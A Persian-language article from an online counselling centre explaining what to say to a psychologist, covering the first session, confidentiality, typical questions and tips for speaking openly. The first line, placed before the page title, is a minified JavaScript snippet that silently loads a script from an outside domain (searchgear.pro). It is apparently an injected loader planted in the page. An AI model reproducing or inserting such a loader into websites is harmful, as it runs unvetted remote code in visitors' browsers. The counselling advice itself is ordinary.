;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); به روانشناس چه بگوییم؟ | مرکز مشاوره آنلاین روان‌یاری

به روانشناس چه بگوییم؟

میزان پیشرفت خواندن شما

فهرست مطالب

به روانشناس چه بگوییم؟ شاید این سوال بسیاری از مراجعین پیش از رفتن به جلسه مشاوره باشد. ما در این مقاله سعی کردیم راهنمایی هایی را در اختیارتون قرار بدیم تا شروع درمان برای شما گنگ و مبهم نباشد.

موفقیت آمیز بودن مشاوره به اتفاق موثر بین مشاور و مراجع وابسته است. برقراری رابطه میان فردی، یک فرایند رشدی ( یا مرحله ای ) است و یکی از مراحل آن کندوکاو در رویداد یا موقعیتی است که مراجع را مجبور کرده است به مشاوره پناه بیاورد.

مراجعانی که وارد مشاوره می شوند از بعضی زمینه‌های زندگی خود آگاه هستند و آنها را درک می کنند ولی بعضی زمینه ها برای آنها پنهان یا سرکوب شده است. در امدادرسانی به مراجعان برای ایجاد تغییر مشاوران باید فعالانه تلاش کنند. پس از برقراری رابطه گرم و مثبت بین مشاور و مراجع، مشاوران باید مهارت هایی به کار ببرند که باعث می‌شوند مراجعان به زندگی خود به شیوه‌ای متفاوت نگاه کنند و مطابق آن فکر، احساس، و رفتار داشته باشند.

مراجعان معمولاً مشاوره را آخرین راه حل مشکل خود می دانند، یعنی زمانی که متوجه میشوند و وضعیتشان، علاوه بر خطرناک بودن، بدون راه حل است. مردم فکر میکنند که افکار، ادراک ها و تفسیر هایشان صحیح است و هنگامی که نظر خود درباره واقعیت را به دیگران ابراز می دارند، معمولا آن را یک حقیقت محض به حساب می آورند.

به روانشناس چه بگوییم؟

شروع یک جلسه درمانی

برای آنکه جلسه مشاوره با موفقیت انجام گیرد باید در آغاز مشاوره روش ها و فنونی به کار گرفته  شود که اضطراب مراجع را کاهش دهد. همچنین باعث شود بین مشاور و مراجع رابطه ی حسنه به وجود آید یعنی شرایطی ایجاد شود که در آن مراجع احساس امنیت و اطمینان کند.

اولین جلسه با یک روانشناس می تواند دلهره آور باشد و این قابل فهم است. ترس از یک تجربه جدید، احتمال قضاوت شدن، احساس ترس در مورد گفتن اسرار زندگی خود کاملا طبیعی است.

برای شروع جلسات درمانی آماده سازی خاصی لازم نیست. درمانگر شما را تشویق می کند تا مشکل فعلی خود را توصیف کنید و در طول جلسه سوالاتی را مطرح می کند.

اکنون شما تصمیم گرفته اید که برای درمان بیماری روانی خود یا مقابله با چالش مهم زندگی خود به یک روانشناس مراجعه کنید ، زمانی که تصمیم به رفتن گرفته اید ، زمان ملاقات را مشخص کرده اید و خود را آماده این جلسه کرده اید اما ممکن است زمانی که وارد مطب شده اید و روبرو روانشناس نشسته اید ذهن شما خالی شود یا  با وجود درک این موضوع که صحبت در مورد مسائل شخصی زندگیتان میتواند کمک بزرگی به شما کند ولی صحبت در موردشان برایتان سخت باشد.

باید از این موضوع مطمئن باشید، هر مشکلی که تصمیم به بیان آن دارید کاملاً بین شما و درمانگر محرمانه باقی می ماند. البته چند مورد استثناء وجود دارد که این موارد نیز به جهت حفاظت از شماست. برای نمونه ممکن است روانشناس نظر خود را بنا به درخواست دادگاه برای کمک به حل پرونده های قضایی ارائه دهد.

به روانشناس چه بگوییم؟

روال اولین جلسه مشاوره :

در ابتدای جلسه مشاوره، زمانی را به حرف زدن درباره خودتان، ترس‌هایتان و نگرانی‌هایتان اختصاص دهید.

  صفر تا صد مراحل مشاوره فردی از شروع تا درمان

مشاور باید بداند چرا شما برای درمان مراجعه کرده‌اید. بنابراین باید در مورد نیازها یا مسائلی که در درمان مدنظر شماست و نیز سابقه درمان شما صحبت شود.

مشاور از شما سوالاتی می پرسد که برخی از آن ها عبارتند از:

  • آیا پیش از این برای درمان مراجعه کرده‌اید؟
  • علائم شما چیست؟
  • زندگی شما در خانه چطور است؟
  • انتظار دارید پس از جلسات درمان به چه چیزی برسید؟
  • و …

همچنین شما نیز در اولین جلسه مشاوره می توانید سوالاتی بپرسید:

  • شما چه مدت تجربه کار به عنوان مشاور و درمانگر را دارید؟
  • آیا محتوای جلسه و اطلاعات من محرمانه می‌ماند؟
  • من در بین جلسات چه کاری باید انجام دهم؟
  • و …
به روانشناس چه بگوییم؟

یادگیری هنر بی پرده صحبت کردن :

  • قبل از حضورتان در جلسه آنچه را که میخواهید بیان کنید برنامهدریزی کنید و تمرین کنید و خوب فکر کنید که میخواهید درمورد چه چیزی صحبت کنید
  • آنچه را که میخواهید با حضورتان درآنجا بدست بیاورید بیان کنید . زمانی که در مورد اهدافتان و انتظارات خود با روانشناس صحبت  می کنید میتوانید معیار هایی که به کمک آن به سنجش موفقیت خود در طول مسیر به آن نیاز دارید، دست پیدا کنید .
  • افکار و احساسات خود را به اشتراک بگذارید . درمورد هرچیز که حس میکنید ، حتی اگر فکرمیکنید بی اهمیت است با روانشناس خود صحبت کنید .اگر از گفتن واقعیت های زندگیان که خجالت زده تان میکند سرباز زنید ،روانشناس هیچ کمکی نمیتواند به شما کند .به عبارت دیگر روانشناس  ها خواننده ذهنتان نیستند!
  • به روانشناس به چشم نزدیک ترین محرم خود ببینید و به یاد داشته باشید  که او طبق قانون  موظف است از راز های زندگیتان محافظت کند و این را بدانید  که شما هرچیزی را میتوانید به روانشناس خود بگویید  بدون اینکه نگران قضاوت یا انتقاد آن باشید.
  • جزیئات روزمره زندگی خود را بازگو کنید برای مثال : برنامه خواب ، برنامه غذایی و مدت  فعالیت های هفتگی بدنتان
  •  و سخن آخر با خودتان و با روانشناس‌تان صادق باشید.
Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.